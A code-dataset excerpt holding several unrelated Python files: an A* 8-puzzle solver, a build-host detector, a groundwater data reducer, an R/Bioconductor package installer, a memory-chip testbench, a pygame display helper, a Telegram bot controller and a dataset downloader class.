h2(state.board)\n\n visited = []\n\n depth = 1\n\n while depth != 1000 and len(stack) != 0:\n print(\"visited:\", len(visited))\n stack.sort(key=lambda x: x.heuristics)\n\n s = stack.pop(0)\n depth = s.depth\n\n if flatten(s.info.board) not in visited:\n expanded = expand(s.info, N)\n # for each descendant we add the node to the tree and the new stack\n # we also create an edge between the parent and the newly created node\n for x in expanded:\n new_node = Node(x)\n new_node.heuristics = s.heuristics + h1(x.board) + h2(x.board)\n stack.append(new_node)\n tree.add_node(new_node)\n s.add_edge(new_node, 1)\n # as we already expanded 's' we need to add it's final state to the visited list\n visited.append(flatten(s.info.board))\n \n solution = contains_goal(stack, N)\n if solution is not None:\n print(\"Found Solution, Depth\", depth)\n return solution, tree\n \n # just to return if max depth is reached, as we dont want to keep an infinite loop,\n # the solution may be on depth 10000, as this is BFS we have no way to guarantee a\n # solution is found, so we keep a maximum depth expansion\n return None, tree\n\nif __name__ == \"__main__\":\n print(\"---- A* -----\")\n\n # print(\"8-PUZZLE\")\n # board = [\n # [1, 2, 3],\n # [5, 0, 6],\n # [4, 7, 8]\n # ]\n # initial = State(board, (1, 1), \"Start\")\n # print(initial)\n\n # t = time.time_ns()\n # node, tree = aStar(initial, 8)\n # if node is not None:\n # path = find_path(node)\n # print(\"- Solution -\")\n # print_path(path)\n # else:\n # print(\"- No Solution -\")\n # elapsed_time = time.time_ns() - t\n # print(\"Elapsed Time:\", elapsed_time / 1000.0, \"ms\")\n\n print(\"8-PUZZLE\")\n board = [\n [1, 3, 6],\n [5, 2, 0],\n [4, 7, 8]\n ]\n initial = State(board, (2, 1), \"Start\")\n print(initial)\n\n t = time.time_ns()\n node, tree = aStar(initial, 8)\n if node is not None:\n path = find_path(node)\n print(\"- Solution -\")\n print_path(path)\n else:\n print(\"- No Solution -\")\n elapsed_time = time.time_ns() - t\n print(\"Elapsed Time:\", elapsed_time / 1000.0, \"ms\")\n\n # print(\"8-PUZZLE\")\n # board = [\n # [1, 6, 2],\n # [5, 7, 3],\n # [0, 4, 8]\n # ]\n # initial = State(board, (0, 2), \"Start\")\n # print(initial)\n\n # t = time.time_ns()\n # node, tree = aStar(initial, 8)\n # if node is not None:\n # path = find_path(node)\n # print(\"- Solution -\")\n # print_path(path)\n # else:\n # print(\"- No Solution -\")\n # elapsed_time = time.time_ns() - t\n # print(\"Elapsed Time:\", elapsed_time / 1000.0, \"ms\")\n\n # print(\"8-PUZZLE\")\n # board = [\n # [8, 4, 6],\n # [5, 0, 7],\n # [2, 3, 1]\n # ]\n\n # initial = State(board, (1, 1), \"Start\")\n # print(initial)\n\n # t = time.time_ns()\n # node, tree = aStar(initial, 8)\n # if node is not None:\n # path = find_path(node)\n # print(\"- Solution -\")\n # print_path(path)\n # else:\n # print(\"- No Solution -\")\n # elapsed_time = time.time_ns() - t\n # print(\"Elapsed Time:\", elapsed_time / 1000.0, \"ms\")\n\n # print(\"16-PUZZLE\")\n # board = [\n # [5, 1, 3, 4],\n # [2, 0, 7, 8],\n # [10, 6, 11, 12],\n # [9, 13, 14, 15]\n # ]\n # initial = State(board, (1, 1), \"Start\")\n # print(initial)\n\n # t = time.time_ns()\n # node, tree = aStar(initial, 15)\n # if node is not None:\n # path = find_path(node)\n # print(\"- Solution -\")\n # print_path(path)\n # else:\n # print(\"- No Solution -\")\n # elapsed_time = time.time_ns() - t\n # print(\"Elapsed Time:\", elapsed_time / 1000.0, \"ms\")","sub_path":"Praticas/TP2/ex2c_aStar.py","file_name":"ex2c_aStar.py","file_ext":"py","file_size_in_byte":4107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"560829405","text":"# Copyright 2010-2020 Amazon.com, Inc. or its affiliates. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\").\n# You may not use this file except in compliance with the License.\n# A copy of the License is located at\n#\n# http://aws.amazon.com/apache2.0\n#\n# or in the \"license\" file accompanying this file. This file is distributed\n# on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either\n# express or implied. See the License for the specific language governing\n# permissions and limitations under the License.\n\nimport os\nimport sys\n\n\ndef current_platform():\n if sys.platform == 'win32':\n return 'windows'\n elif sys.platform == 'darwin':\n return 'macos'\n elif 'linux' in sys.platform or sys.platform in ('cygwin', 'msys'):\n return 'linux'\n\n\ndef current_arch():\n if current_platform() == 'linux':\n if os.uname()[4][:3].startswith('arm'):\n arch = ('armv8' if sys.maxsize > 2**32 else 'armv7')\n return ('x64' if sys.maxsize > 2**32 else 'x86')\n\n\ndef _file_contains(path, search):\n if os.path.isfile(path):\n #print('Probing {}'.format(path))\n with open(path) as f:\n line = f.readline()\n while line:\n #print(' {}'.format(line), end='')\n if search in line:\n return True\n line = f.readline()\n return False\n\n\n# cache the result of this, since it involves a bunch of file I/O\n_current_host = None\n\n\ndef current_host():\n try:\n return _current_host\n except:\n def _discover_host():\n platform = current_platform()\n if platform == 'linux':\n if _file_contains('/etc/system-release', 'Amazon Linux release 2'):\n return 'al2'\n if _file_contains('/etc/system-release', 'Bare Metal'):\n return 'al2012'\n if _file_contains('/etc/redhat-release', 'CentOS release 5.11 (Final)'):\n return 'manylinux'\n if _file_contains('/etc/redhat-release', 'CentOS Linux release 7.7.1908'):\n return 'manylinux'\n if _file_contains('/etc/lsb-release', 'Ubuntu'):\n return 'ubuntu'\n return 'linux'\n else:\n return platform\n _current_host = _discover_host()\n return _current_host\n","sub_path":"builder/host.py","file_name":"host.py","file_ext":"py","file_size_in_byte":2419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"352092739","text":"import logging\nimport os\ntry:\n from pylib.config import config, parse_args \nexcept ModuleNotFoundError:\n from config import config, parse_args\nimport pylib.gwreducer.constants as c\nfrom pylib.gwreducer.parse_input_file import parse_input_file\nfrom pylib.gwreducer.read_gw import GWData\nfrom pylib.gwreducer.reduce_dataset import reduce_dataset\nfrom pylib.gwreducer.summary_file import reset_summary_file \nimport pylib.gwreducer.reduce_groundwater_timeseries as rgt\n\ndef configure_logger(args):\n \"\"\"\n set the logger for this utility\n \"\"\"\n logging.basicConfig(\n level=c.LOG_LEVEL_MAP[args.loglevel],\n filemode=args.logfilemode.lower(),\n filename=args.logfile,\n **config[c.LOGGER_KEY]\n )\n\ndef get_inputfile(args):\n \"\"\"get input file or fail \"\"\"\n if os.path.exists(args.inputFile):\n return args.inputFile\n raise IOError(\"Could not locate input file '{}'.\".format(args.inputFile))\n\ndef get_output_folder(args):\n \"\"\" get output directory or fail\"\"\"\n if os.path.exists(args.outputFolder):\n return args.outputFolder\n raise IOError(\"Could not locate output folder '{}'.\".format(args.outputFolder))\n\n\n\ndef reduce_for_row_col(gw_data, row, col,\n summary_file, output_folder):\n \"\"\"\n extract a TimeSeries instance from a GWData\n corresponding to the target row/col and then reduce it\n \n returns True if succeded in reducing; false otherwise\n \n \"\"\"\n timeseries = gw_data.extract(row, col)\n worked = reduce_dataset(\n timeseries, summary_file, output_folder\n )\n return worked\n\n\ndef reduce_input_data(input_data, summary_file, output_folder):\n \"\"\"\n Reduce all the data in the input_data object for the\n given filekey\n\n \"\"\"\n filekey = input_data[\"Source File\"]\n logging.info(\"START reducing {}\".format(filekey))\n gw_data = GWData(filekey)\n\n for rowcol in gw_data.get_rowcols:\n row, col = rowcol.split('-')\n try:\n timeseries = gw_data.extract(row, col)\n \n #rt, rv = rgt.reduce_dataset(times, values)\n\n worked = reduce_for_row_col(\n gw_data, row, col,\n summary_file, output_folder)\n except TypeError as e:\n raise Exception(e)\n logging.error(\"failed at {} {}\".format(row, col))\ndef main():\n \"\"\" \n parse the input arguments, configure the logger\n obtain the input data\n reduce the input data\n and write the results\n\n \"\"\"\n\n args = parse_args()\n configure_logger(args)\n logging.info(\"START execution\")\n input_file = get_inputfile(args)\n input_data = parse_input_file(input_file)\n output_folder = get_output_folder(args)\n summary_filename = \"summary.csv\"\n summary_file = reset_summary_file(output_folder, summary_filename)\n reduce_input_data(input_data, summary_file,\n output_folder)\n\n logging.info(\"END execution\")\n\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"pylib/hssmbuilder/gwreducer/unused_code/reducer.py","file_name":"reducer.py","file_ext":"py","file_size_in_byte":3047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"227832347","text":"from rpy2.robjects.packages import importr\nimport rpy2.robjects as robjects\nimport click\nimport os, subprocess\n\n\nCONTEXT_SETTINGS = dict(help_option_names=['-h','--help'], max_content_width=90)\n\n@click.group(context_settings= CONTEXT_SETTINGS)\n@click.version_option(version='0.1')\ndef install():\n pass\n\nclass PackageInstaller:\n def __init__(self):\n self.lib_xml_location=os.popen('type xml2-config').read().split()[-1]\n self.lib_xml_location=robjects.r('function (xml.config) {Sys.setenv(XML_CONFIG=xml.config)}')(self.lib_xml_location)\n\n def install_bioconductor(self):\n base = importr('base')\n base.source(\"http://www.bioconductor.org/biocLite.R\")\n\n def install_tcga_biolinks(self):\n biocinstaller = importr(\"BiocInstaller\")\n biocinstaller.biocLite(\"TCGAbiolinks\")\n\n def install_minfi_others(self):\n biocinstaller = importr(\"BiocInstaller\")\n biocinstaller.biocLite(robjects.vectors.StrVector([\"minfi\",\"ENmix\",\n \"minfiData\",\"sva\",\"GEOquery\",\"geneplotter\"]))\n\n def install_custom(self, custom, manager):\n if not manager:\n biocinstaller = importr(\"BiocInstaller\")\n biocinstaller.biocLite(robjects.vectors.StrVector(custom),suppressUpdates=True)\n else:\n biocinstaller = importr(\"BiocManager\")\n for c in custom:\n if '=' in c:\n pkg,version= tuple(c.split('='))\n biocinstaller.install(pkg,ask=False,version=version)\n else:\n biocinstaller.install(c,ask=False)\n\n def install_devtools(self):\n subprocess.call('conda install -y -c r r-cairo=1.5_9 r-devtools=1.13.6',shell=True)\n robjects.r('install.packages')('devtools')\n\n def install_r_packages(self, custom):\n robjects.r[\"options\"](repos=robjects.r('structure(c(CRAN=\"http://cran.wustl.edu/\"))'))\n robjects.r('install.packages')(robjects.vectors.StrVector(custom))\n\n def install_meffil(self, git=False):\n if git:\n remotes=importr('remotes')\n remotes.install_github('perishky/meffil')\n else:\n subprocess.call(\"wget https://github.com/perishky/meffil/archive/master.zip && unzip master.zip && mv meffil-master meffil && R CMD INSTALL meffil\",shell=True)\n\n@install.command()\ndef change_gcc_path():\n \"\"\"Change GCC and G++ paths if don't have version 7.2.0. [Experimental]\"\"\"\n bin_path = os.path.join(os.popen('conda list | grep \"packages in environment at\" | awk \"{print $6}\"').read().split()[-1].replace(':',''),'bin')\n subprocess.call('export CC={}'.format(os.path.join(bin_path,'x86_64-conda_cos6-linux-gnu-gcc')),shell=True)\n subprocess.call('export CXX={}'.format(os.path.join(bin_path,'x86_64-conda_cos6-linux-gnu-g++')),shell=True)\n\n## Install ##\n@install.command()\ndef install_bioconductor():\n \"\"\"Installs bioconductor.\"\"\"\n installer = PackageInstaller()\n installer.install_bioconductor()\n\n@install.command()\n@click.option('-p', '--package', multiple=True, default=['ENmix'], help='Custom packages.', type=click.Path(exists=False), show_default=True)\n@click.option('-m', '--manager', is_flag=True, help='Use BiocManager (recommended).')\ndef install_custom(package,manager):\n \"\"\"Installs bioconductor packages.\"\"\"\n installer = PackageInstaller()\n installer.install_custom(package,manager)\n\n@install.command()\n@click.option('-p', '--package', multiple=True, default=[''], help='Custom packages.', type=click.Path(exists=False), show_default=True)\ndef install_r_packages(package):\n \"\"\"Installs r packages.\"\"\"\n installer = PackageInstaller()\n installer.install_r_packages(package)\n\n@install.command()\ndef install_minfi_others():\n \"\"\"Installs minfi and other dependencies.\"\"\"\n installer = PackageInstaller()\n installer.install_minfi_others()\n\n@install.command()\ndef install_tcga_biolinks():\n \"\"\"Installs tcga biolinks.\"\"\"\n installer = PackageInstaller()\n installer.install_tcga_biolinks()\n\n@install.command()\ndef install_meffil():\n \"\"\"Installs meffil (update!).\"\"\"\n installer = PackageInstaller()\n installer.install_meffil()\n\n@install.command()\ndef install_some_deps():\n \"\"\"Installs bioconductor, minfi, enmix, tcga biolinks, and meffil.\"\"\"\n installer = PackageInstaller()\n installer.install_bioconductor()\n installer.install_minfi_others()\n installer.install_tcga_biolinks()\n installer.install_meffil()\n\n# install.packages(\"png\", \"/home/user/anaconda3/lib/R/library\")\n\n\n\nif __name__ == '__main__':\n install()\n","sub_path":"build/lib/pymethylprocess/installer.py","file_name":"installer.py","file_ext":"py","file_size_in_byte":4574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"67945996","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n DWF Python Example\n\n Modified by: MURAMATSU Atsushi \n Revised: 2016-04-21\n Original Author: Digilent, Inc.\n Original Revision: 8/21/2014\n\n Requires: \n Python 2.7, 3.3 or later\n\"\"\"\n\n#System librarys\nimport sys\nimport os\n#from matplotlib.pyplot import *\n#import numpy as np\nfrom time import sleep\n#from scipy import stats\nimport csv\n#Own librarys\nfrom waveform import *\nfrom vcd2 import *\nfrom verilog import *\nfrom xml import*\n\n\npath = \"C:/Users/Labor/Desktop\"\npath = \"C:/Users/Jocker/Desktop/desktop_150118/DigitalIO_EdwardNLB_v2.0\"\nfile = \"test9.xml\"\n\nxml.init(path=path,file=file)\n\nfreq = 10e6\n\nserial_len = 0\n\n# Setup Supply Voltage VDD25 for DD.DIO / Edward\ndd.configAIO(2.5)\n# Set Digital Discovery DO Channels for JTAG and SPI\ndd.setDIO(\n freq = freq,\n dio1_pins = DIO1_PINS(TCK=0, TMS =1, TDI=2, TRIGGER =3, # JTAG\n DIN=5, SYNC1=7, SCLK=4, SYNC0=6 ) # SPI\n ) \n \n\n#sleep(1)\n\n###############################################################################\n#### Setup AD2/ Supply Voltage and Multiplexer DI\n###############################################################################\n\n#analysis.config_discovery(freq = freq)\n\nSegmentVolt1 = [0.0]\nSegmentVolt2 = [0.0]\nSegmentVolt3 = [0.0]\nSegmentVolt4 = [0.0]\nSegmentVolt5 = [0.0]\nSegmentVolt6 = [0.0]\nSegmentTime = []\nSegmentMeas = []\nSegmentID = []\nSegmentTrigger = []\nSequences = []\nSequenceCycles = []\n\n###############################################################################\n#### Set Edward Voltages and SA Current\n###############################################################################\n\nserial.waveformReset()\n\nedward.reset(freq = freq)\nedward.idcode()\nserial.trig()\n\nedward.addr_jtag(MACRO = 0, SECTOR = 0b00, WL = 0, BL = 0)\nedward.irefsel_jtag(0b01)\nedward.timingsrc_jtag(0b01) \nedward.detrap(0b00)\n\n#edward.srcsel(0b0)\nedward.atd_en(0b0)\nedward.set_vbl_idle(0b0)\nedward.set_vread(0b10)\n\nedward.set_vwl_idle(0b0)\n\n\nedward.maskref_wr(0x0000)\nedward.maskref_rd(0x0000)\n\nedward.t_eq(360e-9)\nedward.t_read(360e-9)\nedward.t_be(10E-6)\nedward.t_write(10e-6)\nedward.t_inhib(300e-9)\nedward.t_detrap(320E-9)\nedward.n_wakeup(1)\n\n#enable binning\nbinning = 0x0\nedward.bin_neighbor(0b0)\nedward.binning(binning)\n\n#edward.cmd_jtag(C_BE)\n#edward.cmd_jtag(C_BP)\n\nedward.dma(0b1)\n\nSegmentVolt1 += [0.0]\nSegmentVolt2 += [0.0]\nSegmentVolt3 += [0.0]\nSegmentVolt4 += [0.0]\nSegmentVolt5 += [0.0]\nSegmentVolt6 += [0.0]\nSegmentTime += [(len(serial.tms)-serial_len)/freq]\nSegmentMeas += [0]\nSegmentID += [1]\nSegmentTrigger += [0]\n\nSequences += [1]\nSequenceCycles += [1]\n\nserial_len = len(serial.tms)\n\n###############################################################################\n#### DMA Mode\n###############################################################################\n\nedward.addr_jtag(MACRO = 0, SECTOR = 0b00, WL = 0, BL = 1)\nedward.datain_jtag(0x1)\n\nSegmentVolt1 += [0.0]\nSegmentVolt2 += [0.0]\nSegmentVolt3 += [0.0]\nSegmentVolt4 += [0.0]\nSegmentVolt5 += [0.0]\nSegmentVolt6 += [0.0]\nSegmentTime += [(len(serial.tms)-serial_len)/freq]\nSegmentMeas += [0]\nSegmentID += [2]\nSegmentTrigger += [0]\n\nramp_time = 1/freq\nhold_time = 10e-6\nserial.clockCycle((2*ramp_time+hold_time)*freq)\n\nSegmentVolt1 += [4.5,4.5,0.0] #VWL_ACT\nSegmentVolt2 += [0.0,0.0,0.0] #VBL_ACT\nSegmentVolt3 += [0.0,0.0,0.0] #VSL_ACT\nSegmentVolt4 += [1.5,1.5,0.0] #VWL_PAS\nSegmentVolt5 += [3.0,3.0,0.0] #VBLSL_PAS\nSegmentVolt6 += [0.0,0.0,0.0] #VBULK\nSegmentTime += [ramp_time,hold_time,ramp_time ]\nSegmentMeas += [10,50,10]\nSegmentID += [2,2,2]\nSegmentTrigger += [0,0,0]\n\nserial_len = len(serial.tms)\n\ncycles = 16\n\nSequences += [2]\nSequenceCycles += [cycles*2]\n\nfor wl in range(2):\n for i in range(1,cycles*2,2):\n edward.datain_jtag(i)\n edward.addr_jtag(MACRO = 0, SECTOR = 0b00, WL = wl, BL = 1)\n serial.clockCycle((2*ramp_time+hold_time)*freq)\n\n\n#figure(\"Dummy Measurements\")\n#step(arange(len(serial.tms))/freq/1E-6, np.array(serial.tms)-1.2)\n#step(arange(len(serial.tms))/freq/1E-6, np.array(serial.tdi)-2.4)\n\nxml.SeqArb3PU(plot_waveform = False,\n SegmentVolt1 = SegmentVolt1,\n SegmentVolt2 = SegmentVolt2,\n SegmentVolt3 = SegmentVolt3,\n SegmentVolt4 = SegmentVolt4,\n SegmentVolt5 = SegmentVolt5,\n SegmentVolt6 = SegmentVolt6,\n SegmentTime = SegmentTime,\n SegmentMeas = SegmentMeas,\n SegmentID = SegmentID,\n SegmentTrigger = SegmentTrigger,\n Sequences = Sequences,\n SequenceCycles = SequenceCycles)\n\ndd.configDIO()\n\nstep(arange(len(dd.rgwSamples)),dd.rgwSamples)\n\ndd.close()","sub_path":"_testbench_prg.py","file_name":"_testbench_prg.py","file_ext":"py","file_size_in_byte":4916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"273983655","text":"import pygame\nfrom pygame import draw, display, rect\nfrom pygame.locals import SWSURFACE, FULLSCREEN, HWSURFACE, DOUBLEBUF\ndef build(settings): \n\tpygame.init()\n\tfullscreen = True\n\t \n\tif fullscreen:\n\t\tdepth = 0\n\t\tflags = FULLSCREEN | HWSURFACE | DOUBLEBUF\n\telse:\n\t\tdepth = 16\n\t\tflags = SWSURFACE | DOUBLEBUF\n\t \n\tmodes = display.list_modes(depth, flags)\n\tif fullscreen:\n\t\tif modes == -1: # Welcome to exceptionlessland\n\t\t\traise SystemExit(\"Failed to initialize display\")\n\t\telse:\n\t\t\tmode = max(modes)\n\telse:\n\t\tmode = (settings.screen_width,settings.screen_height)\n\t \n\tdisplay.set_mode(mode, flags)\n\t#print(modes)\n\t#print(mode[0])\n\t#print(mode[1])\n\treturn (display.get_surface(),mode[0],mode[1])\n","sub_path":"display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"331522205","text":"from sqlalchemy.exc import NoResultFound\nfrom telegram import Update\nfrom telegram.ext import Updater, CallbackContext, ConversationHandler, CommandHandler\n\nfrom ring_of_fire_bot.model.Exceptions.invalid_node_key_exception import InvalidNodeKeyException\nfrom ring_of_fire_bot.model.user import User\nfrom ring_of_fire_bot.repository.i_unit_of_work import IUnitOfWork\nfrom ring_of_fire_bot.utils.utils import is_in_dm\nfrom ring_of_fire_bot.view.error_view import ErrorView\nfrom ring_of_fire_bot.view.user_view import UserView\n\n\nclass UserController:\n def __init__(self, updater: Updater, unit_of_work: IUnitOfWork):\n self.updater = updater\n self.unit_of_work = unit_of_work\n self.userView: UserView = UserView(self.updater)\n self.error_view: ErrorView = ErrorView(self.updater)\n\n def get_commands(self):\n return ConversationHandler(entry_points=[\n CommandHandler(\"register\", self.register),\n CommandHandler(\"update_username\", self.update_username),\n CommandHandler(\"set_node_id\", self.set_node_id),\n CommandHandler(\"remove_node_id\", self.remove_node_id)\n ],\n states={}, fallbacks=[], allow_reentry=True)\n\n def register(self, update: Update, context: CallbackContext):\n # check if in DM\n if not is_in_dm(update):\n self.error_view.not_in_private(update.effective_chat.id)\n return\n\n sender = update.effective_user\n try:\n _ = self.unit_of_work.user_repository.get(sender.id)\n # if user_repository.get does not throw a NoResultFound exception the user has already registered\n self.error_view.send_message(update.effective_chat.id, \"You are already registered!\")\n except NoResultFound:\n user = User(sender.id, sender.username)\n self.unit_of_work.user_repository.add(user)\n self.userView.registered(update.effective_chat.id)\n return\n\n def update_username(self, update: Update, context: CallbackContext):\n if not is_in_dm(update):\n self.error_view.not_in_private(update.effective_chat.id)\n return\n try:\n user = self.unit_of_work.user_repository.get(update.effective_user.id)\n user.set_username(update.effective_user.username)\n self.unit_of_work.complete()\n self.userView.updated_username(update.effective_chat.id, user.user_username)\n except NoResultFound:\n self.error_view.send_message(update.effective_chat.id, \"Please /register before updating \"\n \"your username\")\n\n def set_node_id(self, update: Update, context: CallbackContext):\n node_id = update.message.text.split(' ', 1)[1]\n if not is_in_dm(update):\n self.error_view.not_in_private(update.effective_chat.id)\n return\n try:\n user = self.unit_of_work.user_repository.get(update.effective_user.id)\n user.set_node_id(node_id)\n self.unit_of_work.complete()\n self.userView.updated_node_id(update.effective_chat.id, node_id)\n except NoResultFound:\n self.error_view.send_message(update.effective_chat.id, \"Please /register before updating \"\n \"your node id\")\n except InvalidNodeKeyException:\n self.error_view.send_message(update.effective_chat.id, \"The node id is invalid\")\n\n def remove_node_id(self, update: Update, context: CallbackContext):\n if not is_in_dm(update):\n self.error_view.not_in_private(update.effective_chat.id)\n return\n try:\n user: User = self.unit_of_work.user_repository.get(update.effective_user.id)\n user.remove_node_id()\n self.unit_of_work.complete()\n self.userView.removed_node_id(update.effective_chat.id)\n except NoResultFound:\n self.error_view.send_message(update.effective_chat.id, \"Please /register before removing your node id\")\n except InvalidNodeKeyException:\n self.error_view.send_message(update.effective_chat.id, \"The node id is invalid\")\n","sub_path":"ring_of_fire_bot/controller/user_controller.py","file_name":"user_controller.py","file_ext":"py","file_size_in_byte":4229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"382428019","text":"import io\nimport logging\nimport os\nimport re\nimport zipfile\nfrom pathlib import Path\nfrom typing import Union\n\nimport natsort as ns\nimport requests\nfrom jsonpath_ng import parse\nfrom scitree import scitree\nfrom tqdm import tqdm\n\nfrom datahugger.utils import _format_filename\nfrom datahugger.utils import _is_url\n\nFILE_RANKING = [\n [\"readme\", \"read_me\", \"read-me\"],\n [\"license\"],\n [\"installation\", \"install\", \"setup\"],\n]\n\n\ndef _scientific_sort(f, alg=ns.PATH):\n for rank, names in enumerate(FILE_RANKING):\n if Path(f).stem.lower() in names:\n prio = rank\n break\n else:\n prio = len(FILE_RANKING)\n\n x = (prio,) + ns.natsort_keygen(alg=alg)(f)\n\n return x\n\n\nclass DatasetResult:\n \"\"\"Result class after downloading the dataset.\"\"\"\n\n def __str__(self):\n return f\"<{self.__class__.__name__} n_files={len(self)} >\"\n\n def __len__(self):\n return len(self.files)\n\n def tree(self, **kwargs):\n \"\"\"Return the folder tree.\n\n Tree based on scientific sort.\n \"\"\"\n\n return scitree(self.output_folder, **kwargs)\n\n\nclass DatasetDownloader:\n \"\"\"Base class for downloading resources from repositories.\"\"\"\n\n API_URL = None\n\n def __init__(\n self,\n url: Union[str, int],\n version=None,\n base_url=None,\n max_file_size=None,\n force_download=False,\n progress=True,\n unzip=True,\n print_only=False,\n ):\n super().__init__()\n self.url = url\n self.version = version\n self.base_url = base_url\n self.max_file_size = max_file_size\n self.force_download = force_download\n self.progress = progress\n self.unzip = unzip\n self.print_only = print_only\n\n def _get_attr_attr(self, record, jsonp):\n try:\n jsonpath_expression = parse(jsonp)\n return jsonpath_expression.find(record)[0].value\n except Exception:\n return None\n\n def _get_attr_link(self, record):\n # get the link to the folder\n if self._get_attr_kind(record) == \"folder\":\n if not hasattr(self, \"ATTR_FOLDER_LINK_JSONPATH\"):\n return None\n\n return self._get_attr_attr(record, self.ATTR_FOLDER_LINK_JSONPATH)\n\n # get the link to the file\n else:\n if not hasattr(self, \"ATTR_FILE_LINK_JSONPATH\"):\n return None\n\n return self._get_attr_attr(record, self.ATTR_FILE_LINK_JSONPATH)\n\n def _get_attr_name(self, record):\n if not hasattr(self, \"ATTR_NAME_JSONPATH\"):\n return None\n\n return self._get_attr_attr(record, self.ATTR_NAME_JSONPATH)\n\n def _get_attr_size(self, record):\n if not hasattr(self, \"ATTR_SIZE_JSONPATH\"):\n return None\n\n return self._get_attr_attr(record, self.ATTR_SIZE_JSONPATH)\n\n def _get_attr_hash(self, record):\n if not hasattr(self, \"ATTR_HASH_JSONPATH\"):\n return None\n\n return self._get_attr_attr(record, self.ATTR_HASH_JSONPATH)\n\n def _get_attr_hash_type(self, record):\n if hasattr(self, \"ATTR_HASH_TYPE_VALUE\"):\n return self.ATTR_HASH_TYPE_VALUE\n\n if not hasattr(self, \"ATTR_HASH_TYPE_JSONPATH\"):\n return None\n\n return self._get_attr_attr(record, self.ATTR_HASH_TYPE_JSONPATH)\n\n def _get_attr_kind(self, record):\n if not hasattr(self, \"ATTR_KIND_JSONPATH\"):\n return \"file\"\n\n return self._get_attr_attr(record, self.ATTR_KIND_JSONPATH)\n\n def download_file(\n self,\n file_link,\n output_folder,\n file_name,\n file_size=None,\n file_hash=None,\n file_hash_type=None,\n ):\n \"\"\"Download a single file.\n\n Arguments\n ---------\n file_link: str\n Path to the file to download.\n output_folder: str\n The folder to store the downloaded file.\n file_name: str\n The filename of the downloaded file.\n file_size: int\n The size of the file in bytes.\n file_hash: str\n The MD5 hash of the file.\n\n \"\"\"\n if (\n file_size is not None\n and self.max_file_size is not None\n and file_size >= self.max_file_size\n ):\n logging.info(f\"Skipping large file {file_link}\")\n if self.progress:\n print(f\"{_format_filename(file_name)}: SKIPPED\")\n return\n\n if not self.print_only:\n logging.info(f\"Downloading file {file_link}\")\n res = requests.get(file_link, stream=True)\n\n output_fp = Path(output_folder, file_name)\n Path(output_fp).parent.mkdir(parents=True, exist_ok=True)\n\n if not self.force_download and output_fp.exists():\n print(\"File already exists:\", file_name)\n return\n\n if self.progress:\n with tqdm.wrapattr(\n open(output_fp, \"wb\"),\n \"write\",\n miniters=1,\n desc=_format_filename(file_name),\n total=int(res.headers.get(\"content-length\", 0)),\n bar_format=\"{l_bar}{bar}| {n_fmt}/{total_fmt}\",\n ) as fout:\n for chunk in res.iter_content(chunk_size=4096):\n fout.write(chunk)\n else:\n with open(output_fp, \"wb\") as f:\n f.write(res.content)\n else:\n print(f\"{_format_filename(file_name)}: COMPLETE\")\n\n def _parse_url(self, url):\n if not isinstance(url, str) or not _is_url(url):\n raise ValueError(\"Not a valid URL.\")\n\n # first try to parse with version number\n if hasattr(self, \"REGEXP_ID_AND_VERSION\"):\n match = re.search(self.REGEXP_ID_AND_VERSION, url)\n\n if match and match.group(1):\n if match.group(2) == \"\":\n return match.group(1), None\n return match.group(1), match.group(2)\n\n # then try to parse without version number\n if hasattr(self, \"REGEXP_ID\"):\n match = re.search(self.REGEXP_ID, url)\n\n if match and match.group(1):\n return match.group(1), None\n\n raise ValueError(f\"Failed to parse record identifier from URL '{url}'\")\n\n def _unpack_single_folder(self, zip_url, output_folder):\n r = requests.get(zip_url)\n z = zipfile.ZipFile(io.BytesIO(r.content))\n\n for zip_info in z.infolist():\n if zip_info.filename[-1] == \"/\":\n continue\n zip_info.filename = os.path.basename(zip_info.filename)\n z.extract(zip_info, output_folder)\n\n @property\n def api_record_id(self):\n if hasattr(self, \"_api_record_id\"):\n return self._api_record_id\n\n if isinstance(self.url, str) and _is_url(self.url):\n self._api_record_id, self.version = self._parse_url(self.url)\n else:\n self._api_record_id, self.version = self.url, self.version\n\n return self._api_record_id\n\n def _pre_files(self):\n pass\n\n def _get_files_recursive(self, url, folder_name=None):\n if not isinstance(url, str):\n ValueError(f\"Expected url to be string type, got {type(url)}\")\n\n result = []\n\n # get the data from URL\n res = requests.get(url)\n response = res.json()\n\n # find path to raw files\n if hasattr(self, \"META_FILES_JSONPATH\"):\n jsonpath_expression = parse(self.META_FILES_JSONPATH)\n files_raw = jsonpath_expression.find(response)[0].value\n else:\n files_raw = response\n\n for f in files_raw:\n # create the file or folder path\n if folder_name is None:\n f_path = self._get_attr_name(f)\n else:\n f_path = str(Path(folder_name, self._get_attr_name(f)))\n\n if self._get_attr_kind(f) == \"folder\":\n result.extend(\n self._get_files_recursive(\n self._get_attr_link(f), folder_name=f_path\n )\n )\n else:\n result.append(\n {\n \"link\": self._get_attr_link(f),\n \"name\": f_path,\n \"size\": self._get_attr_size(f),\n \"hash\": self._get_attr_hash(f),\n \"hash_type\": self._get_attr_hash_type(f),\n }\n )\n\n if hasattr(self, \"PAGINATION_JSONPATH\"):\n jsonpath_expression = parse(self.PAGINATION_JSONPATH)\n next_url = jsonpath_expression.find(response)[0].value\n\n if next_url:\n result.extend(\n self._get_files_recursive(next_url, folder_name=folder_name)\n )\n\n return result\n\n @property\n def files(self):\n if hasattr(self, \"_files\"):\n return self._files\n\n self._pre_files()\n\n self._files = self._get_files_recursive(\n self.API_URL_META.format(\n api_url=self.API_URL,\n api_record_id=self.api_record_id,\n version=self.version,\n base_url=self.base_url,\n )\n )\n\n return self._files\n\n def _get(\n self,\n output_folder: Union[Path, str],\n **kwargs,\n ):\n if len(self.files) == 1 and 